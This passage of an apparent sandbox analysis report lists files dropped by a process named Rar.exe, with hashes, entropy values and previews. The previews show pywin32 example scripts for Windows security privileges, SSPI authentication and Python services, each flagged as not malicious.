                                                                                                                                                                                                                                  SSDEEP:96:J+cKmpPpEf/gnFU3KSb5a89KmZywFVF1f1isGGoa:JzKmVp50b/tV
                                                                                                                                                                                                                                  MD5:2DB725B308FF772F50BC84EF9809EE40
                                                                                                                                                                                                                                  SHA1:86ED4BA5FCE949AFCBCA967733867231A023521A
                                                                                                                                                                                                                                  SHA-256:DBC8B5F7C6D4F28D6506703A110BBD452FB4231B4127281223A44D8E79CE5CFC
                                                                                                                                                                                                                                  SHA-512:ABAB163113EE68A20BF70B1A89BF01CF3A4EC512F0299B671BF68DBC48BD62F41E052AB8C3EA1EA02C96973A2DF62F51B0BA27BB3A11BE55A20F3B093FC7E89E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import os..import ntsecuritycon.import win32api.import win32con.import win32file.import win32security.from win32security import (. ACL_REVISION_DS,. CONTAINER_INHERIT_ACE,. DACL_SECURITY_INFORMATION,. GROUP_SECURITY_INFORMATION,. OBJECT_INHERIT_ACE,. OWNER_SECURITY_INFORMATION,. PROTECTED_DACL_SECURITY_INFORMATION,. SACL_SECURITY_INFORMATION,. SE_FILE_OBJECT,.)..## SE_SECURITY_NAME needed to access SACL, SE_RESTORE_NAME needed to change owner to someone other than yourself.new_privs = (. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_SECURITY_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_RESTORE_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),.).ph = win32api.GetCurrentProcess().th = win32security.OpenProcessToken(. ph, win32security.TOKEN_ALL_ACCESS | win32con.TOKEN_ADJUST_PRIVILEGES.).modified_privs = win32security.AdjustTokenPrivileges(th, 0, new_privs
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2258
                                                                                                                                                                                                                                  Entropy (8bit):5.257866200243561
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:xIhkp2h2hdh8hLhVJhBhh/zznnPkSubzUrxL+5JwcyM2iUrEkI0B:K2cYjK5rJnhJ3nnPkSqwwXwcyMXUIE
                                                                                                                                                                                                                                  MD5:FDFAC9188A86C2D91EC792520151731A
                                                                                                                                                                                                                                  SHA1:CB6EF5643BF3DBCA85EF4001215ABDDECC14D0B3
                                                                                                                                                                                                                                  SHA-256:CDC4E5B7AE77D537E930D42288E2DA434FB5C7AE2E8FCF6F6CAB433E62100228
                                                                                                                                                                                                                                  SHA-512:CB0A01D281A0C9D8E273F0D16D3364BE61A034233485B86471FB466DD4151EFDBE3750FED7BD8EC5DD12C29129EF8B93A873BF878A0D58B3B0A6E35C378EB3CC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:fname = r"h:\tmp.txt"..import ntsecuritycon.import win32api.import win32con.import win32file.import win32security..new_privs = (. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_SECURITY_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_SHUTDOWN_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_TCB_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_RESTORE_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_TAKE_OWNERSHIP_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_CREATE_PERMANENT_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", "SeEnableDelegatio
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):965
                                                                                                                                                                                                                                  Entropy (8bit):5.211924428673646
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:1dVaWGkiQ+MpbSBWxGftBaIftBNIfWwr12rNn:1ztpSBHBacBN1A2Bn
                                                                                                                                                                                                                                  MD5:ECF5691E717B094357E941118E31434C
                                                                                                                                                                                                                                  SHA1:A6749854996DB82308E0D8C0A3AC1372FC67FF48
                                                                                                                                                                                                                                  SHA-256:E5D33C48D397F60FF60F9A5C6F0425C4FB2A8669320C8D14ACF4F430C239440A
                                                                                                                                                                                                                                  SHA-512:3426EE7152F575B329E24B6F2D7FD5C8044DDBDB3A63108235813F523C77020C0303F5F0ED1F25914BF908648F1183700695C728384B41D2225BE4799D11E80F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import ntsecuritycon.import win32api.import win32file.import win32security..policy_handle = win32security.GetPolicyHandle("rupole", win32security.POLICY_ALL_ACCESS)..event_audit_info = win32security.LsaQueryInformationPolicy(. policy_handle, win32security.PolicyAuditEventsInformation.).print(event_audit_info)..new_audit_info = list(event_audit_info[1]).new_audit_info[win32security.AuditCategoryPolicyChange] = (. win32security.POLICY_AUDIT_EVENT_SUCCESS | win32security.POLICY_AUDIT_EVENT_FAILURE.).new_audit_info[win32security.AuditCategoryAccountLogon] = (. win32security.POLICY_AUDIT_EVENT_SUCCESS | win32security.POLICY_AUDIT_EVENT_FAILURE.).new_audit_info[win32security.AuditCategoryLogon] = (. win32security.POLICY_AUDIT_EVENT_SUCCESS | win32security.POLICY_AUDIT_EVENT_FAILURE.)..win32security.LsaSetInformationPolicy(. policy_handle, win32security.PolicyAuditEventsInformation, (1, new_audit_info).)..win32security.LsaClose(policy_handle).
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4917
                                                                                                                                                                                                                                  Entropy (8bit):5.272689420786585
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:Yrcny/jWiv5k/IDkdU/pqyaai78ziK9DJarxYlf7h8xl:Y+y/jWiv5k/Igwq8x+KumZel
                                                                                                                                                                                                                                  MD5:EF8021AF7913DDA04DDF02F2C0DE7C23
                                                                                                                                                                                                                                  SHA1:00BC54F54DCBB9A5A24DE537941BC25DD4AA7C13
                                                                                                                                                                                                                                  SHA-256:4B7C41345F179C949CB6EF6014B170B85CAEF1E85815AFAD4B6EE702361159AA
                                                                                                                                                                                                                                  SHA-512:38F53067622A35A712FFAFE44472563A9052B822BB370AF6844896792C1A39D0E23797065EFE00EAA9F74614BFDB1B8F9B9A924D0487D4B70F81DE26C83D63AD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import win32api.import win32con.import win32process.import win32security..## You need SE_RESTORE_NAME to be able to set the owner of a security descriptor to anybody.## other than yourself or your primary group. Most admin logins don't have it by default, so.## enabling it may fail.new_privs = (. (. win32security.LookupPrivilegeValue("", win32security.SE_SECURITY_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_TCB_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_SHUTDOWN_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_RESTORE_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_TAKE_OWNERSHIP_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivileg
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4392
                                                                                                                                                                                                                                  Entropy (8bit):5.2487634042183835
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:Snqrcny/jWiv5k/IDkdAqI08Jarx+LwfGfyh8u:h+y/jWiv5k/IgWqHjjj
                                                                                                                                                                                                                                  MD5:4ABA1E68BAC79456F9C3A0609712D9EB
                                                                                                                                                                                                                                  SHA1:A9D86A09BBCD2AF8380189B71614A22501EE6351
                                                                                                                                                                                                                                  SHA-256:7E1144512E75466D6BE8CE265F88CBB33EB0FB5F3D6EDACEA99F1317A2FF98E1
                                                                                                                                                                                                                                  SHA-512:A0316A045611F4270245766BF712D6378F4BCC38203760834075CE5854D60F95F71B6618C758D455D19DB1C736A7FE8C379D31BFF4F8D449EFC90BB7EC58DDE9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import win32api.import win32con.import win32process.import win32security..fname, tmp = win32api.GetTempFileName(win32api.GetTempPath(), "tmp").print(fname).## You need SE_RESTORE_NAME to be able to set the owner of a security descriptor to anybody.## other than yourself or your primary group. Most admin logins don't have it by default, so.## enabling it may fail.new_privs = (. (. win32security.LookupPrivilegeValue("", win32security.SE_SECURITY_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_TCB_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_SHUTDOWN_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_RESTORE_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_TAKE_OWNERSHIP_NAME),.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4541
                                                                                                                                                                                                                                  Entropy (8bit):5.258881603906181
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:Yrcny/jWiv5k/IDkdU/pqygiK9uJarxIn2e7h8HjU:Y+y/jWiv5k/IgwqCKhWjwU
                                                                                                                                                                                                                                  MD5:9DB47F76ED6E8A88CBE1E4B9F23CE295
                                                                                                                                                                                                                                  SHA1:24630AB98FFAF3B001F7F7F85CE9B8265BF53C63
                                                                                                                                                                                                                                  SHA-256:2AD30A8C118FA254D47A4C31E04B5D16524B486A80C7DEB4A9381052B786B0B5
                                                                                                                                                                                                                                  SHA-512:05046DA2645B83997EB094A1FED82D2BFA4E84C2841B4792DAE44933376D1926D1F3B9B96DDE8DD486DCBC1271EB05683D5A57C8528F75128CA43715A74B9A04
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import win32api.import win32con.import win32process.import win32security..## You need SE_RESTORE_NAME to be able to set the owner of a security descriptor to anybody.## other than yourself or your primary group. Most admin logins don't have it by default, so.## enabling it may fail.new_privs = (. (. win32security.LookupPrivilegeValue("", win32security.SE_SECURITY_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_TCB_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_SHUTDOWN_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_RESTORE_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_TAKE_OWNERSHIP_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivileg
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3382
                                                                                                                                                                                                                                  Entropy (8bit):5.237699635064882
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:eny/jWmJv5zAS/YIDkh3pkinPPS5hMbo3aA6K8GoQdlTpr:eny/jWiv5k/IDkdHqIE3ai8RWHr
                                                                                                                                                                                                                                  MD5:7DCADEC88612DD294016B68E78555986
                                                                                                                                                                                                                                  SHA1:8944F04FBDDB40F986D6BBC56D91C9458568F2AC
                                                                                                                                                                                                                                  SHA-256:4A6A9531E547F1B37C95633D70C0187C42EC814E8754C1BFA2E49C105CC4953E
                                                                                                                                                                                                                                  SHA-512:50837D9BA259B0F9DF8DC9F82CD3FEFF30952879AF9AEC1E2077E53E8316F5499D119B52309F5D042F543DB0D41368BDC8FA902611CE23B850077FD3FB4170FE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import win32api.import win32con.import win32process.import win32security..new_privs = (. (. win32security.LookupPrivilegeValue("", win32security.SE_SECURITY_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_TCB_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_SHUTDOWN_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_RESTORE_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_TAKE_OWNERSHIP_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_CREATE_PERMANENT_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_ENABLE_DELEGATION_NAME),. win32con.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5481
                                                                                                                                                                                                                                  Entropy (8bit):4.3341623144023025
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:vWoYyit70UN8J99Vyiu6SuuC+D8d6o1lyEfZVw:Z5it707yiTSFXwd71lyEfZVw
                                                                                                                                                                                                                                  MD5:4FB50CD03A213D9C3696D05DD228F03F
                                                                                                                                                                                                                                  SHA1:F6C604FD9A3B939D350C76623D0556DF412913F3
                                                                                                                                                                                                                                  SHA-256:5F10CB276CCAA10D00FBD01126B316C045DC26D65C2F5F03825D19084D44048D
                                                                                                                                                                                                                                  SHA-512:BC5FB9C1978733BF174E70B8956BEA1641D6B066AEEE499C5212CC55D72B646B4D6AF8A5106AC3F1FC744DC1D0CD5986EDD7EC8BAD1F039BF4E93125612EA179
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""".Fetches a URL from a web-server supporting NTLM authentication.eg, IIS...If no arguments are specified, a default of http://localhost/localstart.asp.is used. This script does follow simple 302 redirections, so pointing at the.root of an IIS server is should work.."""..import http.client # sorry, this demo needs 2.3+.import optparse.import urllib.error.import urllib.parse.import urllib.request.from base64 import decodestring, encodestring..from sspi import ClientAuth..options = None # set to optparse options object...def open_url(host, url):. h = http.client.HTTPConnection(host). # h.set_debuglevel(9). h.putrequest("GET", url). h.endheaders(). resp = h.getresponse(). print("Initial response is", resp.status, resp.reason). body = resp.read(). if resp.status == 302: # object moved. url = "/" + resp.msg["location"]. resp.close(). h.putrequest("GET", url). h.endheaders(). resp = h.getresponse(). print("After redire
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2857
                                                                                                                                                                                                                                  Entropy (8bit):5.268166314469273
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:OcDheGUbSo31BtMhZJpu31qkMqwzzqgq0qQGnIHsorrI+JTYnSJY50C+c9wyMDRJ:7eGwBtMbJo1qkMqizqgq0qxnIhrMV0cq
                                                                                                                                                                                                                                  MD5:C903127F2939DF13251320C082311B90
                                                                                                                                                                                                                                  SHA1:6F6DF731BE829317C134B731817939DEBE071A97
                                                                                                                                                                                                                                  SHA-256:F76852F275C183F907DF441FF63A9A53BC48DC725331D3DCAB3848A41A5EA32F
                                                                                                                                                                                                                                  SHA-512:747A8E05304303EF8AAFFF2D46FA3D858967B05DD31BA13CDAE698EFF4E553CE6793303FA65B2C13234874E979A24DF4F587C9A79AF9502388BB4CE83F76202A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# A demo of basic SSPI authentication..# There is a 'client' context and a 'server' context - typically these will.# be on different machines (here they are in the same process, but the same.# concepts apply).import sspi.import sspicon.import win32api.import win32security...def lookup_ret_code(err):. for k, v in list(sspicon.__dict__.items()):. if k[0:6] in ("SEC_I_", "SEC_E_") and v == err:. return k...""".pkg_name='Kerberos'.sspiclient=SSPIClient(pkg_name, win32api.GetUserName(), ## target spn is ourself. None, None, ## use none for client name and authentication information for current context. ## u'username', (u'username',u'domain.com',u'passwd'),. sspicon.ISC_REQ_INTEGRITY|sspicon.ISC_REQ_SEQUENCE_DETECT|sspicon.ISC_REQ_REPLAY_DETECT| \. sspicon.ISC_REQ_DELEGATE|sspicon.ISC_REQ_CONFIDENTIALITY|sspicon.ISC_REQ_USE_SESSION_KEY).sspiserver=SSPIServer(pkg_name, None,. sspicon.ASC_REQ_INTEGRITY|sspicon.ASC_REQ_SEQUENCE_DETECT|sspicon.ASC_RE
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6361
                                                                                                                                                                                                                                  Entropy (8bit):4.427558647447183
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:M33Chyu7QCY4fZ9VCNasbYWdrdZE+wToisvEo0Wst0mTjg9/Z+RV8X:MCgsuuCNaSY0ZE+ZvQWst0ejgebO
                                                                                                                                                                                                                                  MD5:75D5A35B4EE8B8DC4E4FDD5B5400584B
                                                                                                                                                                                                                                  SHA1:4EE7C6CF3B71822A268672C2405C1509916333DC
                                                                                                                                                                                                                                  SHA-256:9A9AF6C5EF6044CA082AEDE43EBFCEE1917B7DEC1F377323B679F1F2330673DF
                                                                                                                                                                                                                                  SHA-512:5DCBB7B5A989C7D26861BC23D60AA79B014B4A172CD9C4401C8BEFB88A53F8928A83A60CD3813B2ECA2A85676A5A572AFD74FE2A0B43920E76AE74ADF542B217
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""A sample socket server and client using SSPI authentication and encryption...You must run with either 'client' or 'server' as arguments. A server must be.running before a client can connect...To use with Kerberos you should include in the client options.--target-spn=username, where 'username' is the user under which the server is.being run...Running either the client or server as a different user can be informative..A command-line such as the following may be useful:.`runas /user:{user} {fqp}\python.exe {fqp}\socket_server.py --wait client|server`..{fqp} should specify the relevant fully-qualified path names...To use 'runas' with Kerberos, the client program will need to.specify --target-spn with the username under which the *server* is running...See the SSPI documentation for more details.."""...import http.client # sorry, this demo needs 2.3+.import optparse.import socketserver.import struct.import traceback..import sspi.import win32api.import win32security..options = None # se
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1128
                                                                                                                                                                                                                                  Entropy (8bit):4.72989402530247
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:JgRTg/scLBkLesqldQsC4WgWNoLIpDbF898iLyxsYkuN4mRe:JGgk6Bzs+dxrvLIxbF898iLyiYHKmA
                                                                                                                                                                                                                                  MD5:7BD62BDDEA1DCCC3865FAA118C757D2C
                                                                                                                                                                                                                                  SHA1:B61E0C8977189AB067449C38D2A1D6284D61C25F
                                                                                                                                                                                                                                  SHA-256:1A3DABD6ED521A3D0D4F9B5C08B888C31F5BCF4279FE8CC7B2C98210F77936F9
                                                                                                                                                                                                                                  SHA-512:4ED8BCE08C20A18110A1FCD97C26CE5B6B1CF82EB755F8F72DE72693742E1726AAA455461139FE30154CD5D4C10723E33097EE33AC1439E62FC7676B73E99668
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Demonstrates how to validate a password..# See also MSKB article Q180548.#.# To use with Kerberos you need to jump through the 'targetspn' hoops...import sys..import win32security.from sspi import ClientAuth, ServerAuth...def validate(username, password, domain=""):. auth_info = username, domain, password. ca = ClientAuth("NTLM", auth_info=auth_info). sa = ServerAuth("NTLM").. data = err = None. while err != 0:. err, data = ca.authorize(data). err, data = sa.authorize(data). # If we get here without exception, we worked!...if __name__ == "__main__":. if len(sys.argv) not in [2, 3, 4]:. print("Usage: %s username [password [domain]]" % (__file__,)). sys.exit(1).. # password and domain are optional!. password = None. if len(sys.argv) >= 3:. password = sys.argv[2]. domain = "". if len(sys.argv) >= 4:. domain = sys.argv[3]. try:. validate(sys.argv[1], password, domain). print("Validated OK").
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2135
                                                                                                                                                                                                                                  Entropy (8bit):4.562211316978868
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:A07kBblOiMGpg1DMjtqyNycLNH7aJEywPfo4E4tLgO8M:A07kBZOFSgQsyRLZC4osgO8M
                                                                                                                                                                                                                                  MD5:4F13CA50A137FD86C6F22E1F0082970F
                                                                                                                                                                                                                                  SHA1:5E24BA918FFD189703DC09360460C870B6C9E9A7
                                                                                                                                                                                                                                  SHA-256:2970786059E4DB3E95D38D38A6BBF6A16D4E520FE077BF8D86582106673A20B7
                                                                                                                                                                                                                                  SHA-512:8BCFDA29A39851B622DCA268474F1FCB61E3E7C66FE3980D314B57A956BB72CFA324BE19F82F5D8D6F193A17571B91B09D91D7100D899D587890FEABE146990A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# This is an example of a service hosted by python.exe rather than.# pythonservice.exe...# Note that it is very rare that using python.exe is a better option.# than the default pythonservice.exe - the latter has better error handling.# so that if Python itself can't be initialized or there are very early.# import errors, you will get error details written to the event log. When.# using python.exe instead, you are forced to wait for the interpreter startup.# and imports to succeed before you are able to effectively setup your own.# error handling...# So in short, please make sure you *really* want to do this, otherwise just.# stick with the default...import os.import sys..import servicemanager.import win32serviceutil.from pipeTestService import TestPipeService...class NativeTestPipeService(TestPipeService):. _svc_name_ = "PyNativePipeTestService". _svc_display_name_ = "Python Native Pipe Test Service". _svc_description_ = "Tests Python.exe hosted services". # tell win32serv
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6893
                                                                                                                                                                                                                                  Entropy (8bit):4.585752418885161
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:C7hRuRwOeqkUJcSC8dccc6sfQ0ulF8C8twh7KPAcCLp/2cAdqOJ:C+y/ocSC8Kcc6MQX7jFKPAHuPdPJ
                                                                                                                                                                                                                                  MD5:B21995DADB96151A3178C89778F5821F
                                                                                                                                                                                                                                  SHA1:592856A829A06EB302353B70E7B0999F50A885EC
                                                                                                                                                                                                                                  SHA-256:6EA910AC3A4B58C77F4B312753F894367DCA3FADB5A23D1F70A60526CA7F1133
                                                                                                                                                                                                                                  SHA-512:1AD8A118582AB2D8CD145B219347F0216E2FB73AF3ACC57DD25E1EB8074D7D81C3599C5DA864F26686688E142DEAF74AC7F18435483F10B7DDC4C97FD70EB42B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# A Demo of services and named pipes...# A multi-threaded service that simply echos back its input...# * Install as a service using "pipeTestService.py install".# * Use Control Panel to change the user name of the service.# to a real user name (ie, NOT the SystemAccount).# * Start the service..# * Run the "pipeTestServiceClient.py" program as the client pipe side...import _thread.import traceback..# Old versions of the service framework would not let you import this.# module at the top-level. Now you can, and can check 'Debugging()' and.# 'RunningAsService()' to check your context..import pywintypes.import servicemanager.import win32con.import win32service.import win32serviceutil.import winerror.from ntsecuritycon import *.from win32api import *..# Use "import *" to keep this looking as much as a "normal" service.# as possible. Real code shouldn't do this..from win32event import *.from win32file import *.from win32pipe import *...def ApplyIgnoreError(fn, args):. try:. ret
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script text executable Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4481
                                                                                                                                                                                                                                  Entropy (8bit):4.484804480076562
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:mRjd2OzAT63NFgwgihr8rbSw3SFm05GN8EVE6i:mRjE0f3D7h+b13Il52vVE6i
                                                                                                                                                                                                                                  MD5:40792A85E480392D45275CF67BE01422
                                                                                                                                                                                                                                  SHA1:9CBD58C86FC710B6C4CEC25B375503C445F92256
                                                                                                                                                                                                                                  SHA-256:B4A535554E7553743175B46A37DD038F01A32ACFF72D965C8EDC72AEE7676C06
                                                                                                                                                                                                                                  SHA-512:E82BB319609EADDFFE0491149F2F37CE227A9CC7D74845482F0BF8FA694C3E0A0E8A360EE87057AF08D71945E55E3D1D1E334A9171E58E100142A2643E96617B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# A Test Program for pipeTestService.py.#.# Install and start the Pipe Test service, then run this test.# either from the same machine, or from another using the "-s" param..#.# Eg: pipeTestServiceClient.py -s server_name Hi There.# Should work...import os.import sys.import traceback..import pywintypes.import win32api.import winerror.from win32event import *.from win32file import *.from win32pipe import *..verbose = 0..# def ReadFromPipe(pipeName):.# Could (Should?) use CallNamedPipe, but this technique allows variable size.# messages (whereas you must supply a buffer size for CallNamedPipe!.# hPipe = CreateFile(pipeName, GENERIC_WRITE, 0, None, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0).# more = 1.# while more:.# hr = ReadFile(hPipe, 256).# if hr==0:.# more = 0.# except win32api.error (hr, fn, desc):.# if hr==winerror.ERROR_MORE_DATA:.# data = dat.#...def
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4075
                                                                                                                                                                                                                                  Entropy (8bit):4.913580202147345
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:VGAe4yOAJf2klecrcxNokZs9eW8cpkYQQzQ/G3p3f5VF1cTIl5QXoJsbw:Yayffr06k29QcGNHO1/F1cm5K+Iw
                                                                                                                                                                                                                                  MD5:1736FD061AD70B0C9452E0EB63E7699E
                                                                                                                                                                                                                                  SHA1:75BE37D779E98DC848215BF5CA9A34B98071BD39
                                                                                                                                                                                                                                  SHA-256:5C6BB64EA8E1BF7B7011C6464E90ACB155F3C88AD1EDEEE520DC528571E815C1
                                                                                                                                                                                                                                  SHA-512:B9058CC59105489A0C6FA86AF15CDD07FC8F765033446CE0649667A62599656CCDA556B7444963812930DB01357DB03F9F8DB6A404D3AB7FED889B9147AB4783
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# A Demo of a service that takes advantage of the additional notifications.# available in later Windows versions...# Note that all output is written as event log entries - so you must install.# and start the service, then look at the event log for messages as events.# are generated...# Events are generated for USB device insertion and removal, power state.# changes and hardware profile events - so try putting your computer to.# sleep and waking it, inserting a memory stick, etc then check the event log..# Most event notification support lives around win32gui.import servicemanager.import win32con.import win32event.import win32gui.import win32gui_struct.import win32service.import win32serviceutil..GUID_DEVINTERFACE_USB_DEVICE = "{A5DCBF10-6530-11D2-901F-00C04FB951ED}"...class EventDemoService(win32serviceutil.ServiceFramework):. _svc_name_ = "PyServiceEventDemo". _svc_display_name_ = "Python Service Event Demo". _svc_description_ = (. "Demonstrates a Python service which
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2193
                                                                                                                                                                                                                                  Entropy (8bit):4.521126122680342
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:xgD61DVymdypV5MjDABsHOPvKXQ6HOIuc4bqFhc7EfjhNm2on:Q615ndypMDABUOPPvI4eFeALhk2on
                                                                                                                                                                                                                                  MD5:CD4A7FC5E4FD347037BB7256850B9B56
                                                                                                                                                                                                                                  SHA1:2CE36FC7871F79810038D810613F5A4D796D17CA
                                                                                                                                                                                                                                  SHA-256:9628F439FEABE60861DC4EDF838164A81500628FD70D9A43444B08CF50F55CDB
                                                                                                                                                                                                                                  SHA-512:D82B58C53C992430214909CF7F0E4F74BA711E76578A54457AFC805C11B591286FFFEB58EDE69A04E0A6F8063631E9062A234019E32A1828F9CDC8363AB6556B
